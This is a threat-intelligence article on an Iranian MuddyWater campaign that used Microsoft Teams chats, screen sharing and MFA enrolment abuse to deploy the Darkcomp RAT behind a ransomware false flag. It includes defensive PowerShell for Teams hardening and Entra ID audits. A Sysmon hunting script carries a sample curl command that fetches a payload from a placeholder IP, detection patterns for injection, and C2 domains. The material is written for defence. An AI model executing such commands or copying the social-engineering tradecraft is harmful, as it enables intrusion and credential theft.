The campaign, attributed with moderate confidence to MuddyWater, an advanced persistent threat group affiliated with Iran's Ministry of Intelligence and Security (MOIS), represents a significant evolution in the group's tradecraft. In previous operations, MuddyWater relied on phishing emails and exploitation of known vulnerabilities for initial access. In this campaign, documented by Rapid7's incident response team in early 2026, the attack chain began with unsolicited Microsoft Teams chat requests sent to employees. Few organisations have adequately controlled this vector: an external message arrives in the same client and the same format as internal chat, the only visible cues are a one-time accept prompt and the "External" tag beside the sender's name, and the employee has nothing else to judge the sender by until trust has already been established.

The Attack Chain: How It Actually Worked

MuddyWater's Teams-based intrusion followed a methodical sequence that exploited both technical weaknesses and human psychology. The initial contact came through external Microsoft Teams messages — requests that bypass email security controls entirely because they arrive through a trusted business application rather than a monitored email channel. The attackers presented as IT support personnel, a persona that is both plausible within a Teams context and specifically effective because employees are conditioned to cooperate with IT requests.

Once an employee accepted the chat, the attacker's next step was to start a screen-sharing session. Screen sharing is a standard Teams collaboration feature, and an employee using it with what they believed was an IT support contact had no obvious reason for suspicion. During the session, victims were instructed to type credentials into plain text files, named `credentials.txt` and `cred.txt`, ostensibly as part of a troubleshooting process. They were also instructed to add attacker-controlled devices to their multi-factor authentication configuration. This did not defeat MFA; it enrolled the attacker as a legitimate second factor, so that later logins with the captured password would pass MFA without any further involvement from the victim, long after the screen-sharing session had ended.

With the screen visible and the credentials in view, the attacker ran a series of discovery commands: `ipconfig /all` to map the network configuration, `whoami` to confirm the account and its privileges, and `net start` to enumerate running services. VPN configuration files were accessed. In an interactive session of this kind, everything displayed on the employee's screen is exposed, a breadth of exposure that endpoint detection tools, which inspect process, file and network activity rather than what is shown on screen, are not designed to flag.

The Malware Chain: Darkcomp and the Legitimate DLL Cover

Following the interactive session, the attacker deployed a custom malware chain designed to maintain access while evading signature-based detection. The first component, `ms_upd.exe`, was a downloader fetched with `curl` from a remote IP address. It retrieved three further components: `WebView2Loader.dll`, the legitimate Microsoft loader that WebView2 applications ship with, included so that the implant's process resembled one; `visualwincomp.txt`, an encrypted configuration file; and `Game.exe`, the group's custom remote access trojan, designated Darkcomp.

Darkcomp is a capable implant. It presents itself as a Microsoft WebView2 application at the process level, so it passes casual process inspection. It supports twelve distinct command categories, including arbitrary command execution, file upload and deletion, and management of PowerShell and `cmd.exe` shell sessions. Command and control traffic runs over HTTPS on port 443 to `uploadfiler[.]com`, so it blends with ordinary encrypted web traffic. A second C2 domain, `moonzonet[.]com`, had already been linked to MuddyWater activity in early 2026, providing a further thread of attribution continuity.

DWAgent and AnyDesk — both legitimate remote access tools — were also deployed to ensure persistent access even if the custom Darkcomp implant was detected and removed. This layered persistence approach, using legitimate tools alongside custom malware, is characteristic of sophisticated APT groups that anticipate incident response activity and build redundancy into their access architecture.

The Ransomware False Flag: Why MuddyWater Pretended to Be Criminals

The most operationally instructive element of the campaign is what MuddyWater did not do: despite the appearance of a Chaos ransomware attack that triggered the initial incident response engagement, the group never deployed file-encrypting ransomware. No files were encrypted. No ransom demand was made. The Chaos branding was adopted purely to create the appearance of a financially motivated cybercrime attack, directing defenders' attention toward ransomware recovery procedures rather than toward the intelligence collection operation that was the campaign's actual purpose.

This false-flag technique — borrowing ransomware-as-a-service branding to disguise state espionage — is not new to MuddyWater. In late 2025, the group conducted similar activity using the Qilin RaaS brand against an Israeli organisation. The strategic logic is explained by Sergey Shykevich of Check Point Research, who noted in a statement that the approach "gives them considerably more operational flexibility and access to extensive toolkits without the need for internal development investment. It also makes attribution considerably more difficult."

Chaos ransomware itself is a real and active threat. Emerging in February 2025 as a successor to the disrupted BlackSuit operation, Chaos had claimed 36 victims by late March 2026, predominantly in US construction, manufacturing, and services sectors. By borrowing Chaos's visual identity — wallpapers, ransom notes, branding — MuddyWater could send a compromised organisation down a ransomware remediation track while the actual intelligence collection operation continued undetected.

Attribution Evidence

Rapid7's attribution of the campaign to MuddyWater rests on several independent evidence threads. The most specific is a code-signing certificate bearing the name "Donald Gay", issued under Microsoft ID Verified CS AOC CA 02 with thumbprint B674578D4BDB24CD58BF2DC884EAA658B7AA250C, which has been documented as part of MuddyWater's shared toolkit across multiple prior operations. The `moonzonet[.]com` C2 domain had previously been attributed to the group in early 2026 activity.

The technique of injecting code into suspended `pythonw.exe` processes, used during the lateral movement phase of the campaign, is described by Rapid7 as a "MuddyWater hallmark" observed consistently across the group's operations since 2022. The "IT Support" Teams persona is consistent with MuddyWater's documented preference for social engineering scenarios that exploit employees' inclination to cooperate with apparent internal IT staff. The overall campaign was linked to "Operation Olalampo," a 2026 campaign targeting US and Middle East and North Africa (MENA) organisations, providing campaign-level attribution beyond the individual incident.

Separately, Hunt.io revealed a concurrent Iranian-nexus operation targeting the Omani government, in which over 26,000 Ministry of Justice user records and judicial case data were exfiltrated during the same operational period. While the direct link to MuddyWater's Teams campaign was not confirmed, the geographic and temporal overlap is consistent with a coordinated Iranian intelligence collection programme spanning multiple target categories.

Singapore and ASEAN: The Teams Exposure

Microsoft Teams is deployed across Singapore's public service agencies, financial institutions, and multinational corporations at scale. The platform is the primary internal communication tool for the majority of Singapore's enterprise workforce, with external communication capabilities that are frequently enabled for collaboration with vendors, partners, and clients. This deployment profile creates a substantial attack surface for the Teams-based social engineering technique MuddyWater demonstrated.

The specific risk profile in Singapore has two dimensions. The first is the prevalence of Teams in MAS-regulated financial institutions, where the combination of valuable financial data and a workforce accustomed to rapid digital communication creates the conditions under which the "IT Support" social engineering persona is effective. The second is the presence of Singapore-based regional headquarters for multinational corporations operating across ASEAN, which may share technology environments with entities in MENA regions that MuddyWater has directly targeted.

The MAS Technology Risk Management Guidelines 2021 require multi-factor authentication for systems with access to sensitive data. The MuddyWater technique, however, does not bypass MFA; it subverts enrolment. By convincing users to add attacker-controlled devices to their MFA configuration during the Teams session, the group obtains a legitimately registered second factor and never has to defeat the control at login. The distinction matters: an organisation fully compliant with the MFA requirement remains vulnerable to this vector if its procedures do not address the social engineering layer, and in particular if any user can register a new authentication method at any time with no notification and no review.
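The enrolment step described here and in the attack chain above is visible in Entra ID: every registration of a new security method is written to the directory audit log with the source IP, and each Authenticator app device carries its creation time. The following is an added example, not part of Rapid7's report or of any Microsoft guidance; it assumes the Microsoft.Graph PowerShell module and an account holding the Authentication Administrator role, and the function name `Get-RecentAuthenticatorEnrolments` is this example's own. A preventive Conditional Access policy on the "register security information" user action is worth having but does not stop this particular attack on its own, because a coached victim performs the registration from their own compliant device; the review below is what catches the device that should not be there.

```powershell
# Added example (not from the source report). Assumes the Microsoft.Graph module and
# an account with the Authentication Administrator role; nothing tenant-specific is hard-coded.
Import-Module Microsoft.Graph.Reports, Microsoft.Graph.Identity.SignIns, Microsoft.Graph.Users.Actions
Connect-MgGraph -Scopes 'AuditLog.Read.All', 'Directory.Read.All',
                        'UserAuthenticationMethod.ReadWrite.All', 'User.RevokeSessions.All'

function Get-RecentAuthenticatorEnrolments {
    <#
      Lists Microsoft Authenticator devices enrolled in the last $Days days, joined with
      the IP address(es) the "User registered security info" audit events came from.
      Every row is a device the named user must be asked to vouch for.
    #>
    param([int] $Days = 7)

    $sinceUtc = (Get-Date).ToUniversalTime().AddDays(-$Days)
    $filter   = "activityDisplayName eq 'User registered security info' " +
                "and activityDateTime ge $($sinceUtc.ToString('yyyy-MM-ddTHH:mm:ssZ'))"
    $regs     = Get-MgAuditLogDirectoryAudit -All -Filter $filter

    # UPN -> set of source IPs seen registering security info inside the window
    $ipsByUser = @{}
    foreach ($r in $regs) {
        $upn = $r.InitiatedBy.User.UserPrincipalName
        if (-not $upn) { continue }
        if (-not $ipsByUser.ContainsKey($upn)) {
            $ipsByUser[$upn] = [System.Collections.Generic.HashSet[string]]::new()
        }
        if ($r.InitiatedBy.User.IPAddress) { [void]$ipsByUser[$upn].Add($r.InitiatedBy.User.IPAddress) }
    }

    foreach ($upn in $ipsByUser.Keys) {
        # Only Authenticator app devices carry a creation timestamp in Graph; phone/SMS
        # methods registered in the window must be reviewed from the audit rows themselves.
        foreach ($d in Get-MgUserAuthenticationMicrosoftAuthenticatorMethod -UserId $upn) {
            if ($d.CreatedDateTime -and $d.CreatedDateTime -ge $sinceUtc) {
                [pscustomobject]@{
                    User             = $upn
                    MethodId         = $d.Id
                    DeviceName       = $d.DisplayName
                    Enrolled         = $d.CreatedDateTime
                    RegisteredFromIP = ($ipsByUser[$upn] -join ', ')
                }
            }
        }
    }
}

$suspects = Get-RecentAuthenticatorEnrolments -Days 7
$suspects | Format-Table -AutoSize

# Once the user confirms a device is not theirs ($s is that row of $suspects), remove the
# factor and revoke refresh tokens so sessions the attacker already holds die with it:
#   Remove-MgUserAuthenticationMicrosoftAuthenticatorMethod -UserId $s.User `
#       -MicrosoftAuthenticatorAuthenticationMethodId $s.MethodId
#   Revoke-MgUserSignInSession -UserId $s.User
```

Run this daily against a short window rather than once against a long one: the useful signal is a device whose display name the user does not recognise, enrolled from an IP that does not match where the user was working, and that pattern is easiest to spot when the list is short. Removing the factor without revoking sessions leaves the attacker logged in until the tokens expire.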

Immediate Actions for Singapore Security Teams

The first and most operationally impactful control is to review and restrict external Teams messaging. Teams lets organisations configure whether users in other tenants, and people with personal (unmanaged) Teams accounts, can start chats with internal employees. For most organisations, external access should be limited to an allow-list of named partner domains, with chats from unmanaged personal accounts and from trial tenants blocked, rather than left open to any external tenant. Organisations that have not reviewed these settings should do so immediately; they are found in the Microsoft Teams Admin Centre under Users > External access, and the same configuration is exposed through the MicrosoftTeams PowerShell module.

The second control is to prohibit screen sharing with external parties without explicit pre-authorisation from a manager or the IT security team. Screen sharing is legitimate and valuable for authorised remote support, but the MuddyWater intrusion shows that employees cannot reliably tell an authorised request from an unauthorised one once the attacker has established trust through the IT support persona. A procedural control requiring employees to confirm external screen-sharing requests through a separate channel, a phone call to the IT service desk for instance, would defeat this specific vector at minimal operational cost. Its technical counterpart is to configure Teams so that external participants cannot be given control of a shared screen, which removes the step that turns a view of the desktop into hands-on-keyboard access.
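The two controls above, applied from the MicrosoftTeams PowerShell module rather than clicked through the admin centre, so the change can be reviewed and repeated across tenants. This is an added example and not part of Rapid7's report; it assumes the MicrosoftTeams module and a Teams Administrator account, and `partner-bank.example` and `msp.example` are placeholder partner domains.

```powershell
# Added example, not from the source report. Assumes the MicrosoftTeams module and a
# Teams Administrator account; 'partner-bank.example' and 'msp.example' are placeholders.
Import-Module MicrosoftTeams
Connect-MicrosoftTeams

# 1. Baseline: who can reach your users from outside the tenant today?
#    Open federation (AllowFederatedUsers = True with an empty allow-list) plus
#    AllowTeamsConsumer = True is the exposure the MuddyWater chain relies on.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowedDomains, BlockedDomains,
                  AllowTeamsConsumer, AllowTeamsConsumerInbound,
                  AllowPublicUsers, ExternalAccessWithTrialTenants |
    Format-List

# 2. Replace "any external tenant" with an explicit allow-list of partner domains.
$partners = [System.Collections.Generic.List[string]]::new()
$partners.Add('partner-bank.example')
$partners.Add('msp.example')
Set-CsTenantFederationConfiguration -AllowFederatedUsers $true -AllowedDomainsAsAList $partners

# 3. Block the identities an attacker can stand up in minutes: personal (unmanaged)
#    Teams accounts, Skype consumer accounts and trial tenants.
Set-CsTenantFederationConfiguration -AllowTeamsConsumer $false `
                                    -AllowTeamsConsumerInbound $false `
                                    -AllowPublicUsers $false `
                                    -ExternalAccessWithTrialTenants 'Blocked'

# 4. Never let an external participant take control of a shared screen, and keep chat
#    in meetings organised by non-trusted tenants off. The meeting policy also governs
#    screen shares started from a chat, which is how this intrusion began.
Set-CsTeamsMeetingPolicy -Identity Global `
    -AllowExternalParticipantGiveRequestControl $false `
    -AllowExternalNonTrustedMeetingChat $false

# 5. Verify before closing the change.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowedDomains, AllowTeamsConsumer, ExternalAccessWithTrialTenants
Get-CsTeamsMeetingPolicy -Identity Global |
    Select-Object AllowExternalParticipantGiveRequestControl, AllowExternalNonTrustedMeetingChat, ScreenSharingMode
```

Step 2 is the one that needs business sign-off: once the allow-list is set, chats from any tenant not on it stop arriving, so collect the partner domains from the business before running it rather than after. Steps 3 and 4 rarely break anything and can go in first.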

Security teams should also review endpoint and network telemetry for the specific indicators of compromise documented by Rapid7: the `ms_upd.exe` downloader, `Game.exe` / Darkcomp RAT activity, C2 communications to `uploadfiler[.]com`, and `moonzonet[.]com` in historical DNS logs. File names and domains are cheap for the actor to change, so the behavioural pattern of injection into `pythonw.exe`, the indicator Rapid7 reports as stable since 2022, should be added to endpoint detection rules as a high-priority alert trigger. The [RECATOOLS Hash Generator](/tools/hash-generator) can assist in verifying file hashes against the known MuddyWater indicators of compromise published in Rapid7's report.
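The indicators and the `pythonw.exe` injection pattern above, turned into a hunting function that can be run over Sysmon telemetry. This is an added example, not Rapid7's detection content: the eight records are constructed to resemble Sysmon events (IDs 1, 8, 10 and 22), the address `203.0.113.7` is a documentation-range placeholder, and the access-rights check (CREATE_THREAD together with VM_WRITE) is a general injection heuristic rather than a signature from the report. The function name `Find-MuddyWaterActivity` is this example's own.

```powershell
# Added example (not from Rapid7's report). The records below are constructed; in production
# feed the function with events from Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'.

$C2Domains    = @('uploadfiler.com', 'moonzonet.com')           # from the report (defanged in prose)
$IocFileNames = @('ms_upd.exe', 'game.exe', 'visualwincomp.txt')

function Find-MuddyWaterActivity {
    param([Parameter(Mandatory)] [object[]] $Events)

    $findings = [System.Collections.Generic.List[object]]::new()
    function Add-Finding($Record, $Reason) {
        $findings.Add([pscustomobject]@{ UtcTime = $Record.UtcTime; EventId = $Record.Id; Reason = $Reason })
    }

    foreach ($e in $Events) {
        switch ($e.Id) {
            1 {   # ProcessCreate
                $leaf = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
                if ($IocFileNames -contains $leaf) { Add-Finding $e "Known MuddyWater file name executed: $leaf" }
                if ($e.CommandLine -match '(?i)\bcurl(\.exe)?\b.*\bhttps?://' -and
                    $e.CommandLine -match '(?i)\s(-o|--output)\s') {
                    Add-Finding $e 'curl used to write a remote payload to disk'
                }
                # pythonw.exe with no script and a non-Python parent is the hollowing target
                if ($leaf -eq 'pythonw.exe' -and $e.CommandLine -notmatch '(?i)\.pyw?\b' -and
                    $e.ParentImage -notlike '*\python*.exe') {
                    Add-Finding $e 'pythonw.exe started with no script argument (hollowing candidate)'
                }
            }
            10 {  # ProcessAccess: PROCESS_CREATE_THREAD (0x2) + PROCESS_VM_WRITE (0x20) is enough to inject
                $mask = [int]$e.GrantedAccess
                if ($e.TargetImage -like '*\pythonw.exe' -and $e.SourceImage -notlike '*\python*.exe' -and
                    ($mask -band 0x22) -eq 0x22) {
                    Add-Finding $e ("Non-Python process opened pythonw.exe with injection-capable rights ({0})" -f $e.GrantedAccess)
                }
            }
            8 {   # CreateRemoteThread
                if ($e.TargetImage -like '*\pythonw.exe') { Add-Finding $e 'Remote thread created in pythonw.exe' }
            }
            22 {  # DnsQuery
                if ($C2Domains -contains $e.QueryName.ToLowerInvariant()) {
                    Add-Finding $e "DNS query for known C2 domain $($e.QueryName)"
                }
            }
        }
    }
    return $findings
}

# Constructed sample telemetry: six records that should fire, two benign ones that should not.
$sampleEvents = @(
    [pscustomobject]@{ Id=1;  UtcTime='2026-03-10 09:14:02'; Image='C:\Windows\System32\curl.exe'; ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='curl.exe http://203.0.113.7/ms_upd.exe -o C:\Users\Public\ms_upd.exe' }
    [pscustomobject]@{ Id=1;  UtcTime='2026-03-10 09:14:05'; Image='C:\Users\Public\ms_upd.exe'; ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='ms_upd.exe' }
    [pscustomobject]@{ Id=22; UtcTime='2026-03-10 09:14:09'; Image='C:\Users\Public\Game.exe'; QueryName='uploadfiler.com' }
    [pscustomobject]@{ Id=1;  UtcTime='2026-03-10 09:20:31'; Image='C:\Program Files\Python311\pythonw.exe'; ParentImage='C:\Users\Public\Game.exe'; CommandLine='pythonw.exe' }
    [pscustomobject]@{ Id=10; UtcTime='2026-03-10 09:20:31'; SourceImage='C:\Users\Public\Game.exe'; TargetImage='C:\Program Files\Python311\pythonw.exe'; GrantedAccess='0x1FFFFF' }
    [pscustomobject]@{ Id=8;  UtcTime='2026-03-10 09:20:32'; SourceImage='C:\Users\Public\Game.exe'; TargetImage='C:\Program Files\Python311\pythonw.exe' }
    [pscustomobject]@{ Id=1;  UtcTime='2026-03-10 09:30:00'; Image='C:\Program Files\Python311\pythonw.exe'; ParentImage='C:\Windows\explorer.exe'; CommandLine='pythonw.exe C:\Tools\report.py' }
    [pscustomobject]@{ Id=22; UtcTime='2026-03-10 09:31:00'; Image='C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE'; QueryName='outlook.office365.com' }
)

Find-MuddyWaterActivity -Events $sampleEvents | Format-Table UtcTime, EventId, Reason -AutoSize
```

Run as written it reports six findings and ignores the two benign records. The name-based checks will go stale as soon as the actor renames a file or rotates a domain; the three `pythonw.exe` checks (no script argument, injection-capable handle from a non-Python process, remote thread) are the part worth promoting to an always-on rule, and in a real deployment should be tuned against whatever legitimate Python tooling the estate runs.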


Sources